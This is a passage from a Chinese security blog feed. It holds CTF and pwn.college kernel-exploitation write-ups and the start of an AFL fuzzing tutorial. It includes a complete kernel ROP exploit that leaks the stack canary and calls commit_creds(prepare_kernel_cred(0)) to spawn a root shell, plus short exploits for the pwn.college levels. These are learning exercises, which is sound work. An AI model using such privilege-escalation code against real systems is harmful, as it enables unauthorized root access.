class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br></pre></td><td class="code"><pre><code class="hljs sqf"><span class="hljs-variable">__int64</span> <span class="hljs-variable">__fastcall</span> core_copy_func(<span class="hljs-variable">__int64</span> a1)<br>{<br> <span class="hljs-variable">__int64</span> result; <span class="hljs-comment">// rax</span><br> <span class="hljs-variable">_QWORD</span> v2[<span class="hljs-number">10</span>]; <span class="hljs-comment">// [rsp+0h] [rbp-50h] BYREF</span><br><br> v2[<span class="hljs-number">8</span>] = <span class="hljs-variable">__readgsqword</span>(<span class="hljs-number">0</span>x28u);<br> printk(&unk_215);<br> <span class="hljs-keyword">if</span> ( a1 > <span class="hljs-number">63</span> )<br> {<br> printk(&unk_2A1);<br> return <span class="hljs-number">0</span>xFFFFFFFFLL;<br> }<br> <span class="hljs-keyword">else</span><br> {<br> result = <span class="hljs-number">0</span>LL;<br> qmemcpy(v2, &<span class="hljs-built_in">name</span>, (unsigned <span class="hljs-variable">__int16</span>)a1);<br> }<br> return result;<br>}<br></code></pre></td></tr></table></figure><p>其他函数功能分析可以在wiki中查看,wiki讲的很清楚</p><p>思路:</p><ol><li>通过 ioctl 设置 off,然后通过 core_read() leak 出 canary</li><li>通过 core_write() 向 name 写,构造 ropchain</li><li>通过 core_copy_func() 从 name 向局部变量上写,通过设置合理的长度和 canary 进行 rop</li><li>通过 rop 执行 commit_creds(prepare_kernel_cred(0))</li><li>返回用户态,通过 system(“/bin/sh”) 等起 shell</li></ol><p>exp:</p><figure class="highlight arduino"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br><span class="line">77</span><br><span class="line">78</span><br><span class="line">79</span><br><span class="line">80</span><br><span class="line">81</span><br><span class="line">82</span><br><span class="line">83</span><br><span class="line">84</span><br><span class="line">85</span><br><span class="line">86</span><br><span class="line">87</span><br><span class="line">88</span><br><span class="line">89</span><br><span class="line">90</span><br><span class="line">91</span><br><span class="line">92</span><br><span class="line">93</span><br><span class="line">94</span><br><span class="line">95</span><br><span class="line">96</span><br><span class="line">97</span><br><span class="line">98</span><br><span class="line">99</span><br><span class="line">100</span><br><span class="line">101</span><br><span class="line">102</span><br><span class="line">103</span><br><span class="line">104</span><br><span class="line">105</span><br><span class="line">106</span><br><span class="line">107</span><br><span class="line">108</span><br><span class="line">109</span><br><span class="line">110</span><br><span class="line">111</span><br><span class="line">112</span><br><span class="line">113</span><br><span class="line">114</span><br><span class="line">115</span><br><span class="line">116</span><br><span class="line">117</span><br><span class="line">118</span><br><span class="line">119</span><br><span class="line">120</span><br><span class="line">121</span><br><span class="line">122</span><br><span class="line">123</span><br><span class="line">124</span><br><span class="line">125</span><br><span class="line">126</span><br><span class="line">127</span><br><span class="line">128</span><br><span class="line">129</span><br><span class="line">130</span><br><span class="line">131</span><br><span class="line">132</span><br><span class="line">133</span><br><span class="line">134</span><br><span class="line">135</span><br><span class="line">136</span><br><span class="line">137</span><br><span class="line">138</span><br><span class="line">139</span><br><span class="line">140</span><br></pre></td><td class="code"><pre><code class="hljs arduino"><span class="hljs-comment">// gcc exp.c -static -masm=intel -g -o exp</span><br><span class="hljs-meta">#<span class="hljs-keyword">include</span> <span class="hljs-string"><string.h></span></span><br><span class="hljs-meta">#<span class="hljs-keyword">include</span> <span class="hljs-string"><stdio.h></span></span><br><span class="hljs-meta">#<span class="hljs-keyword">include</span> <span class="hljs-string"><unistd.h></span></span><br><span class="hljs-meta">#<span class="hljs-keyword">include</span> <span class="hljs-string"><fcntl.h></span></span><br><span class="hljs-meta">#<span class="hljs-keyword">include</span> <span class="hljs-string"><sys/stat.h></span></span><br><span class="hljs-meta">#<span class="hljs-keyword">include</span> <span class="hljs-string"><sys/types.h></span></span><br><span class="hljs-meta">#<span class="hljs-keyword">include</span> <span class="hljs-string"><sys/ioctl.h></span></span><br><br><span class="hljs-function"><span class="hljs-type">void</span> <span class="hljs-title">spawn_shell</span><span class="hljs-params">()</span></span><br><span class="hljs-function"></span>{<br> <span class="hljs-built_in">system</span>(<span class="hljs-string">"/bin/sh"</span>);<br>}<br><br><span class="hljs-type">size_t</span> commit_creds = <span class="hljs-number">0</span>, prepare_kernel_cred = <span class="hljs-number">0</span>;<br><span class="hljs-type">size_t</span> raw_vmlinux_base = <span class="hljs-number">0xffffffff81000000</span>;<br><span class="hljs-type">size_t</span> vmlinux_base = <span class="hljs-number">0</span>;<br><span class="hljs-function"><span class="hljs-type">size_t</span> <span class="hljs-title">find_symbols</span><span class="hljs-params">()</span></span><br><span class="hljs-function"></span>{<br> FILE* kallsyms_fd = <span class="hljs-built_in">fopen</span>(<span class="hljs-string">"/tmp/kallsyms"</span>, <span class="hljs-string">"r"</span>);<br><br> <span class="hljs-keyword">if</span>(kallsyms_fd < <span class="hljs-number">0</span>)<br> {<br> <span class="hljs-built_in">puts</span>(<span class="hljs-string">"[*]open kallsyms error!"</span>);<br> <span class="hljs-built_in">exit</span>(<span class="hljs-number">0</span>);<br> }<br><br> <span class="hljs-type">char</span> buf[<span class="hljs-number">0x30</span>] = {<span class="hljs-number">0</span>};<br> <span class="hljs-keyword">while</span>(<span class="hljs-built_in">fgets</span>(buf, <span class="hljs-number">0x30</span>, kallsyms_fd))<br> {<br> <span class="hljs-keyword">if</span>(commit_creds & prepare_kernel_cred)<br> <span class="hljs-keyword">return</span> <span class="hljs-number">0</span>;<br> <span class="hljs-built_in">printf</span>(<span class="hljs-string">"%s"</span>,buf);<br> <span class="hljs-keyword">if</span>(<span class="hljs-built_in">strstr</span>(buf, <span class="hljs-string">"commit_creds"</span>) && !commit_creds)<br> {<br> <span class="hljs-comment">/* puts(buf); */</span><br> <span class="hljs-type">char</span> hex[<span class="hljs-number">20</span>] = {<span class="hljs-number">0</span>};<br> <span class="hljs-built_in">strncpy</span>(hex, buf, <span class="hljs-number">16</span>);<br> <span class="hljs-built_in">sscanf</span>(hex, <span class="hljs-string">"%llx"</span>, &commit_creds);<br> <span class="hljs-built_in">printf</span>(<span class="hljs-string">"commit_creds addr: %p\n"</span>, commit_creds);<br> vmlinux_base = commit_creds - <span class="hljs-number">0x9c8e0</span>;<br> <span class="hljs-built_in">printf</span>(<span class="hljs-string">"vmlinux_base addr: %p\n"</span>, vmlinux_base);<br> }<br><br> <span class="hljs-keyword">if</span>(<span class="hljs-built_in">strstr</span>(buf, <span class="hljs-string">"prepare_kernel_cred"</span>) && !prepare_kernel_cred)<br> {<br> <span class="hljs-type">char</span> hex[<span class="hljs-number">20</span>] = {<span class="hljs-number">0</span>};<br> <span class="hljs-built_in">strncpy</span>(hex, buf, <span class="hljs-number">16</span>);<br> <span class="hljs-built_in">sscanf</span>(hex, <span class="hljs-string">"%llx"</span>, &prepare_kernel_cred);<br> <span class="hljs-built_in">printf</span>(<span class="hljs-string">"prepare_kernel_cred addr: %p\n"</span>, prepare_kernel_cred);<br> }<br> }<br><br> <span class="hljs-keyword">if</span>(!(prepare_kernel_cred & commit_creds))<br> {<br> <span class="hljs-built_in">puts</span>(<span class="hljs-string">"[*]Error!"</span>);<br> <span class="hljs-built_in">exit</span>(<span class="hljs-number">0</span>);<br> }<br>}<br><br><span class="hljs-type">size_t</span> user_cs, user_ss, user_rflags, user_sp;<br><span class="hljs-function"><span class="hljs-type">void</span> <span class="hljs-title">save_status</span><span class="hljs-params">()</span></span><br><span class="hljs-function"></span>{<br> __asm__(<span class="hljs-string">"mov user_cs, cs;"</span><br> <span class="hljs-string">"mov user_ss, ss;"</span><br> <span class="hljs-string">"mov user_sp, rsp;"</span><br> <span class="hljs-string">"pushf;"</span><br> <span class="hljs-string">"pop user_rflags;"</span>);<br> <span class="hljs-built_in">puts</span>(<span class="hljs-string">"[*]status has been saved"</span>);<br>}<br><br><span class="hljs-function"><span class="hljs-type">void</span> <span class="hljs-title">set_off</span><span class="hljs-params">(<span class="hljs-type">int</span> fd, <span class="hljs-type">long</span> <span class="hljs-type">long</span> idx)</span></span><br><span class="hljs-function"></span>{<br> <span class="hljs-built_in">printf</span>(<span class="hljs-string">"[*]set off9 to %ld\n"</span>, idx);<br> <span class="hljs-built_in">ioctl</span>(fd, <span class="hljs-number">0x6677889C</span>, idx);<br>}<br><br><span class="hljs-function"><span class="hljs-type">void</span> <span class="hljs-title">core_read</span><span class="hljs-params">(<span class="hljs-type">int</span> fd, <span class="hljs-type">char</span> *buf)</span></span><br><span class="hljs-function"></span>{<br> <span class="hljs-built_in">puts</span>(<span class="hljs-string">"[*]read to buf."</span>);<br> <span class="hljs-built_in">ioctl</span>(fd, <span class="hljs-number">0x6677889B</span>, buf);<br>}<br><br><span class="hljs-function"><span class="hljs-type">void</span> <span class="hljs-title">core_copy_func</span><span class="hljs-params">(<span class="hljs-type">int</span> fd, <span class="hljs-type">long</span> <span class="hljs-type">long</span> size)</span></span><br><span class="hljs-function"></span>{<br> <span class="hljs-built_in">printf</span>(<span class="hljs-string">"[*]copy from user with size: %ld\n"</span>, size);<br> <span class="hljs-built_in">ioctl</span>(fd, <span class="hljs-number">0x6677889A</span>, size);<br>}<br><br><span class="hljs-function"><span class="hljs-type">int</span> <span class="hljs-title">main</span><span class="hljs-params">()</span></span><br><span class="hljs-function"></span>{<br> <span class="hljs-built_in">save_status</span>();<br> <span class="hljs-type">int</span> fd = <span class="hljs-built_in">open</span>(<span class="hljs-string">"/proc/core"</span>, <span class="hljs-number">2</span>);<br> <span class="hljs-keyword">if</span> (fd < <span class="hljs-number">0</span>) <br> {<br> <span class="hljs-built_in">puts</span>(<span class="hljs-string">"[*]open /proc/core error!"</span>);<br> <span class="hljs-built_in">exit</span>(<span class="hljs-number">0</span>);<br> }<br><br> <span class="hljs-built_in">find_symbols</span>();<br> <span class="hljs-type">ssize_t</span> offset = vmlinux_base - raw_vmlinux_base;<br><br> <span class="hljs-built_in">set_off</span>(fd, <span class="hljs-number">0x40</span>);<br> <span class="hljs-type">char</span> buf[<span class="hljs-number">0x40</span>] = {<span class="hljs-number">0</span>};<br> <span class="hljs-built_in">core_read</span>(fd, buf);<br> <span class="hljs-type">size_t</span> canary = ((<span class="hljs-type">size_t</span> *)buf)[<span class="hljs-number">0</span>];<br> <span class="hljs-built_in">printf</span>(<span class="hljs-string">"[+]canary: %p\n"</span>, canary);<br><br> <span class="hljs-type">size_t</span> rop[<span class="hljs-number">0x1000</span>] = {<span class="hljs-number">0</span>};<br> <span class="hljs-type">int</span> i;<br> <span class="hljs-keyword">for</span>(i = <span class="hljs-number">0</span>; i < <span class="hljs-number">10</span>; i++)<br> {<br> rop[i] = canary;<br> }<br><br> rop[i++] = <span class="hljs-number">0xffffffff81000b2f</span> + offset; <span class="hljs-comment">// pop rdi; ret</span><br> rop[i++] = <span class="hljs-number">0</span>;<br> rop[i++] = prepare_kernel_cred; <span class="hljs-comment">// prepare_kernel_cred(0)</span><br><br> rop[i++] = <span class="hljs-number">0xffffffff810a0f49</span> + offset; <span class="hljs-comment">// pop rdx; ret</span><br> rop[i++] = <span class="hljs-number">0xffffffff81021e53</span> + offset; <span class="hljs-comment">// pop rcx; ret</span><br> rop[i++] = <span class="hljs-number">0xffffffff8101aa6a</span> + offset; <span class="hljs-comment">// mov rdi, rax; call rdx; </span><br> rop[i++] = commit_creds;<br><br> rop[i++] = <span class="hljs-number">0xffffffff81a012da</span> + offset; <span class="hljs-comment">// swapgs; popfq; ret</span><br> rop[i++] = <span class="hljs-number">0</span>;<br><br> rop[i++] = <span class="hljs-number">0xffffffff81050ac2</span> + offset; <span class="hljs-comment">// iretq; ret; </span><br><br> rop[i++] = (<span class="hljs-type">size_t</span>)spawn_shell; <span class="hljs-comment">// rip</span><br><br> rop[i++] = user_cs;<br> rop[i++] = user_rflags;<br> rop[i++] = user_sp;<br> rop[i++] = user_ss;<br><br> <span class="hljs-built_in">write</span>(fd, rop, <span class="hljs-number">0x800</span>);<br> <span class="hljs-built_in">core_copy_func</span>(fd, <span class="hljs-number">0xffffffffffff0000</span> | (<span class="hljs-number">0x100</span>));<br> <span class="hljs-keyword">return</span> <span class="hljs-number">0</span>;<br>}<br></code></pre></td></tr></table></figure>]]></content>
</entry>
<entry>
<title>通过pwncollege学习kernel</title>
<link href="/2024/01/22/%E9%80%9A%E8%BF%87pwncollege%E5%AD%A6%E4%B9%A0kernel/"/>
<url>/2024/01/22/%E9%80%9A%E8%BF%87pwncollege%E5%AD%A6%E4%B9%A0kernel/</url>
<content type="html"><![CDATA[<h1 id="前言"><a href="#前言" class="headerlink" title="前言"></a>前言</h1><p>题目链接:<a href="https://pwn.college/system-security/kernel-security">https://pwn.college/system-security/kernel-security</a></p><p>前面几题都还是比较简单的,用作熟悉kernel,笔者认为刚刚好</p><p>但是pwncollege的题目都需要用靶场本身的虚拟机做,逆向的时候可能会很卡,所以可以选择在他们的github上将题目下载下来,再到本机进行逆向,然后再到他们的虚拟机内进行做题</p><p>github链接:<a href="https://github.com/pwncollege/system-security-dojo/tree/main/kernel-security">https://github.com/pwncollege/system-security-dojo/tree/main/kernel-security</a></p><h1 id="level1-0"><a href="#level1-0" class="headerlink" title="level1.0"></a>level1.0</h1><p>首先看他的初始化函数,将flag读入了flag变量当中,使用 <code>proc_create</code> 创建虚拟 <code>proc</code> 文件 <code>pwncollege</code>,这个文件会出现在 <code>/proc/pwncollege</code></p><p><img src="https://cdn.jsdelivr.net/gh/PwnYouLin/blogimage@main/img/202401221924338.png" alt="image-20240122192443149"></p><p>先看他的read函数:</p><p>如果device_state为2程序就会将flag这个变量赋值给用户变量buffer</p><p><img src="https://cdn.jsdelivr.net/gh/PwnYouLin/blogimage@main/img/202401222021304.png" alt="image-20240122202108207"></p><p>接着看他的write函数:</p><p>如果他的password为这个snceewqvyntlwfha,device_state就会为2了</p><p><img src="https://cdn.jsdelivr.net/gh/PwnYouLin/blogimage@main/img/202401221927496.png" alt="image-20240122192741408"></p><p>根据上面的分析,先用open打开/proc/pwncollege,然后用write修改device_state为2,然后利用read将flag赋值给用户变量,接着就可以将flag打印出来了</p><p>exp:</p><figure class="highlight arduino"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br></pre></td><td class="code"><pre><code class="hljs arduino"><span class="hljs-meta">#<span class="hljs-keyword">include</span> <span class="hljs-string"><stdio.h></span></span><br><br><span class="hljs-meta">#<span class="hljs-keyword">include</span> <span class="hljs-string"><fcntl.h></span></span><br><br><br><br><br><span class="hljs-function"><span class="hljs-type">int</span> <span class="hljs-title">main</span><span class="hljs-params">()</span> </span>{<br><br> <span class="hljs-type">char</span> buffer[<span class="hljs-number">100</span>];<br> <span class="hljs-type">int</span> fd=<span class="hljs-built_in">open</span>(<span class="hljs-string">"/proc/pwncollege"</span>,O_RDWR);<br> <span class="hljs-type">char</span> key[]=<span class="hljs-string">"gkklnaumhysmwksq"</span>;<br> <span class="hljs-built_in">write</span>(fd,key,<span class="hljs-built_in">sizeof</span>(key));<br> <span class="hljs-built_in">read</span>(fd,buffer,<span class="hljs-number">100</span>);<br> <span class="hljs-built_in">printf</span>(<span class="hljs-string">"%s"</span>,buffer);<br> <span class="hljs-keyword">return</span> <span class="hljs-number">0</span>;<br><br>}<br></code></pre></td></tr></table></figure><p><img src="https://cdn.jsdelivr.net/gh/PwnYouLin/blogimage@main/img/202401222028507.png" alt="image-20240122202819386"></p><h1 id="level1-1"><a href="#level1-1" class="headerlink" title="level1.1"></a>level1.1</h1><p>和前面一题几乎一样的,只是对题目增加了一点逆向,并且换了一下password</p><figure class="highlight arduino"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br></pre></td><td class="code"><pre><code class="hljs arduino"><span class="hljs-meta">#<span class="hljs-keyword">include</span> <span class="hljs-string"><stdio.h></span></span><br><span class="hljs-meta">#<span class="hljs-keyword">include</span> <span class="hljs-string"><fcntl.h></span></span><br><br><br><span class="hljs-function"><span class="hljs-type">int</span> <span class="hljs-title">main</span><span class="hljs-params">()</span> </span>{<br> <span class="hljs-type">char</span> buffer[<span class="hljs-number">100</span>];<br> <span class="hljs-type">int</span> fd=<span class="hljs-built_in">open</span>(<span class="hljs-string">"/proc/pwncollege"</span>,O_RDWR);<br> <span class="hljs-type">char</span> key[]=<span class="hljs-string">"bbhlnbpoisiduufx"</span>;<br> <span class="hljs-built_in">write</span>(fd,key,<span class="hljs-built_in">sizeof</span>(key));<br> <span class="hljs-built_in">read</span>(fd,buffer,<span class="hljs-number">100</span>);<br> <span class="hljs-built_in">printf</span>(<span class="hljs-string">"%s"</span>,buffer);<br> <span class="hljs-keyword">return</span> <span class="hljs-number">0</span>;<br><br>}<br></code></pre></td></tr></table></figure><p><img src="https://cdn.jsdelivr.net/gh/PwnYouLin/blogimage@main/img/202401222127874.png" alt="image-20240122212756743"></p><h1 id="level2-0"><a href="#level2-0" class="headerlink" title="level2.0"></a>level2.0</h1><p>除了write函数稍有变化,其他函数都没什么太大变化</p><p>从下图可以看到,我们只需要将password传入就可以直接将flag打印出来了</p><p><img src="https://cdn.jsdelivr.net/gh/PwnYouLin/blogimage@main/img/202401232140156.png" alt="image-20240123214010029"></p><p>exp:</p><figure class="highlight arduino"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br></pre></td><td class="code"><pre><code class="hljs arduino"><span class="hljs-meta">#<span class="hljs-keyword">include</span> <span class="hljs-string"><stdio.h></span></span><br><br><span class="hljs-meta">#<span class="hljs-keyword">include</span> <span class="hljs-string"><fcntl.h></span></span><br><br><br><br><br><span class="hljs-function"><span class="hljs-type">int</span> <span class="hljs-title">main</span><span class="hljs-params">()</span> </span>{<br><br> <span class="hljs-type">char</span> buffer[<span class="hljs-number">100</span>];<br> <span class="hljs-type">int</span> fd=<span class="hljs-built_in">open</span>(<span class="hljs-string">"/proc/pwncollege"</span>,O_RDWR);<br> <span class="hljs-type">char</span> key[]=<span class="hljs-string">"exziykkjtlbpfcbn"</span>;<br> <span class="hljs-built_in">write</span>(fd,key,<span class="hljs-built_in">sizeof</span>(key));<br> <span class="hljs-keyword">return</span> <span class="hljs-number">0</span>;<br><br>}<br></code></pre></td></tr></table></figure><p>需要注意的是,内核中打印出来的信息不会直接返回给用户,需要使用dmesg指令查看内核的输出信息才能看到flag</p><h1 id="level3-0"><a href="#level3-0" class="headerlink" title="level3.0"></a>level3.0</h1><p>也是直接输入password,但是不会直接输出flag了,程序给了win函数,执行完之后会将程序的权限改为root</p><p><img src="https://cdn.jsdelivr.net/gh/PwnYouLin/blogimage@main/img/202401232218796.png" alt="image-20240123221856720"></p><figure class="highlight arduino"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br></pre></td><td class="code"><pre><code class="hljs arduino"><span class="hljs-meta">#<span class="hljs-keyword">include</span> <span class="hljs-string"><stdio.h></span></span><br><br><span class="hljs-meta">#<span class="hljs-keyword">include</span> <span class="hljs-string"><fcntl.h></span></span><br><br><br><span class="hljs-function"><span class="hljs-type">int</span> <span class="hljs-title">main</span><span class="hljs-params">()</span> </span>{<br><br> <span class="hljs-type">char</span> buffer[<span class="hljs-number">100</span>];<br> <span class="hljs-type">int</span> fd=<span class="hljs-built_in">open</span>(<span class="hljs-string">"/proc/pwncollege"</span>,O_RDWR);<br> <span class="hljs-type">char</span> key[]=<span class="hljs-string">"izqbzupwclnrwugw"</span>;<br> <span class="hljs-built_in">write</span>(fd,key,<span class="hljs-built_in">sizeof</span>(key));<br> <span class="hljs-built_in">system</span>(<span class="hljs-string">"/bin/sh"</span>);<br> <span class="hljs-keyword">return</span> <span class="hljs-number">0</span>;<br><br>}<br></code></pre></td></tr></table></figure><p><img src="https://cdn.jsdelivr.net/gh/PwnYouLin/blogimage@main/img/202401232221330.png" alt="image-20240123222127244"></p><h1 id="level4-0"><a href="#level4-0" class="headerlink" title="level4.0"></a>level4.0</h1><p>和前面差不多,但是write没了,改为调用ioctl函数</p><p>只需要控制一下cmd,和key就好了</p><p><img src="https://cdn.jsdelivr.net/gh/PwnYouLin/blogimage@main/img/202401232224991.png" alt="image-20240123222408848"></p><p>exp:</p><figure class="highlight arduino"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br></pre></td><td class="code"><pre><code class="hljs arduino"><span class="hljs-meta">#<span class="hljs-keyword">include</span> <span class="hljs-string"><stdio.h></span></span><br><br><span class="hljs-meta">#<span class="hljs-keyword">include</span> <span class="hljs-string"><fcntl.h></span></span><br><br><br><br><br><span class="hljs-function"><span class="hljs-type">int</span> <span class="hljs-title">main</span><span class="hljs-params">()</span> </span>{<br><br> <span class="hljs-type">char</span> buffer[<span class="hljs-number">100</span>];<br> <span class="hljs-type">int</span> fd=<span class="hljs-built_in">open</span>(<span class="hljs-string">"/proc/pwncollege"</span>,O_RDWR);<br> <span class="hljs-type">char</span> key[]=<span class="hljs-string">"bzwgjygwcmubnzhp"</span>;<br> <span class="hljs-built_in">ioctl</span>(fd,<span class="hljs-number">1337</span>,key);<br> <span class="hljs-built_in">system</span>(<span class="hljs-string">"/bin/sh"</span>);<br> <span class="hljs-keyword">return</span> <span class="hljs-number">0</span>;<br><br>}<br></code></pre></td></tr></table></figure><p><img src="https://cdn.jsdelivr.net/gh/PwnYouLin/blogimage@main/img/202401232225885.png" alt="image-20240123222557771"></p>]]></content>
</entry>
<entry>
<title>通过afl-traning学习afl-fuzz</title>
<link href="/2024/01/14/%E9%80%9A%E8%BF%87afl-traning%E5%AD%A6%E4%B9%A0afl-fuzz/"/>
<url>/2024/01/14/%E9%80%9A%E8%BF%87afl-traning%E5%AD%A6%E4%B9%A0afl-fuzz/</url>
<content type="html"><![CDATA[<h1 id="前言"><a href="#前言" class="headerlink" title="前言"></a>前言</h1><p>本文是记录通过afl-training熟悉afl-fuzz的一些用法</p><p>关于afl-fuzz的安装以及一些基础的使用在前面的文章已经提到过了,这里就不再赘述了</p><p>参考文章:</p><p><a href="https://tttang.com/archive/1508/#toc_0x01-quickstart">https://tttang.com/archive/1508/#toc_0x01-quickstart</a></p><p>afl-training项目地址:</p><p><a href="https://github.com/mykter/afl-training">https://github.com/mykter/afl-training</a></p><h1 id="quickstart"><a href="#quickstart" class="headerlink" title="quickstart"></a>quickstart</h1><p>quickstart是通过一个简单的程序来体验afl-fuzz的使用过程</p><p>编译里面的vulnerable.c</p><figure class="highlight routeros"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><code class="hljs routeros">cd quickstart<br><span class="hljs-attribute">CC</span>=afl-clang-fast <span class="hljs-attribute">AFL_HARDEN</span>=1 make<br></code></pre></td></tr></table></figure><p>第二行命令是将编译器换成了afl-clang-fast并加入了环境变量AFL_HARDEN=1,然后进行make</p><p>查看一下makefile:</p><figure class="highlight ruby"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><code class="hljs ruby">youlin<span class="hljs-variable">@ubuntu</span><span class="hljs-symbol">:~/afl/afl-training/quickstart</span><span class="hljs-variable">$ </span>cat <span class="hljs-title class_">Makefile</span> <br><span class="hljs-comment"># Enable debugging and suppress pesky warnings</span><br><span class="hljs-variable constant_">CFLAGS</span> <span class="hljs-string">?=</span> -g -w<br><br><span class="hljs-symbol">all:</span>vulnerable<br><br><span class="hljs-symbol">clean:</span><br>rm -f vulnerable<br><br><span class="hljs-symbol">vulnerable:</span> vulnerable.c<br><span class="hljs-variable">${</span><span class="hljs-variable constant_">CC</span>} <span class="hljs-variable">${</span><span class="hljs-variable constant_">CFLAGS</span>} vulnerable.c -o vulnerable<br></code></pre></td></tr></table></figure><p><code>make</code>默认会编译all,all编译的是vulnerable,所以最终会形成<code>afl-clang-fast -g -w vulnerable.c -o vulnerable</code>。</p><p>vulnerable.c的源代码:</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br><span class="line">77</span><br><span class="line">78</span><br><span class="line">79</span><br><span class="line">80</span><br><span class="line">81</span><br><span class="line">82</span><br><span class="line">83</span><br><span class="line">84</span><br><span class="line">85</span><br><span class="line">86</span><br><span class="line">87</span><br></pre></td><td class="code"><pre><code class="hljs cpp">$ cat vulnerable.c<br><span class="hljs-meta">#<span class="hljs-keyword">include</span> <span class="hljs-string"><string.h></span></span><br><span class="hljs-meta">#<span class="hljs-keyword">include</span> <span class="hljs-string"><stdio.h></span></span><br><span class="hljs-meta">#<span class="hljs-keyword">include</span> <span class="hljs-string"><unistd.h></span></span><br><span class="hljs-meta">#<span class="hljs-keyword">include</span> <span class="hljs-string"><stdlib.h></span></span><br><br><span class="hljs-meta">#<span class="hljs-keyword">define</span> INPUTSIZE 100</span><br><br><span class="hljs-function"><span class="hljs-type">int</span> <span class="hljs-title">process</span><span class="hljs-params">(<span class="hljs-type">char</span> *input)</span></span><br><span class="hljs-function"></span>{<br> <span 